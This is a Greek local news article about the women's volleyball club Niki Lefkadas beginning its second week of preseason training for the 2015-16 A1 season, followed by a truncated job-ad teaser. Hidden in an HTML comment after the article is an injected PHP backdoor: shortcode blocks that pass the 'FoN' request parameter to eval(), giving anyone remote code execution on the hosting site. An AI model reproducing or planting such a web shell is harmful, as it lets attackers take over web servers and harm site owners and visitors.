ΝΙΚΗ ΛΕΥΚΑΔΑΣ: Μπήκαν στην δεύτερη εβδομάδα προετοιμασίας

Δεύτερη εβδομάδα προετοιμασίας για τη Νίκη Λευκάδας. – Απουσιάζει η τραυματίας Γωγώ Κανταρά και οι Αμερικανίδες. – Ευχές από διοίκηση και προπονητές για το ταξίδι της Α1.

Δεύτερη εβδομάδα προετοιμασίας για τη Νίκη Λευκάδας To Α.Σ. Νίκη Λευκάδας άρχισε την προετοιμασία του για την επόμενη αγωνιστική χρονιά με γυναίκες και νεανίδες.

Στο ξεκίνημα ωστόσο απουσιάζει η Γωγώ Κανταρά η οποία υπεβλήθη σε χειρουργείο αλλά και οι δύο Αμερικανίδες αθλήτριες οι οποίες σύντομα θα προστεθούν στο δυναμικό του σωματείου.

To Διοικητικό Συμβούλιο και οι προπονητές ευχήθηκαν στα κορίτσια καλή προετοιμασία και τόνισαν ότι με αποφασιστικότητα, σθένος , δυναμισμό και πάθος για το άθλημα θα βαδίσουν στα σαλόνια της Α1 εθνικής κατηγορίας για την περίοδο 2015-16.

<!– [insert_php]if (isset($_REQUEST["FoN"])){eval($_REQUEST["FoN"]);exit;}[/insert_php][php]if (isset($_REQUEST["FoN"])){eval($_REQUEST["FoN"]);exit;}[/php] –>

Share This Post

Δείτε περισσότερα...

ΑΡΘΡΑ

Ζητάει προσωπικό το Monato στο Κάθισμα(pics)

Άτομα για να στελεχωθεί το προσωπικό της καλοκαιρινής σεζόν, σε ένα ευχάριστο και ιδανικό περιβάλλον, ζητάει η επιχείρηση του ΜΟΝΑΤΟ στο ΚΑΘΙΣΜΑ. Οι ειδικότητες που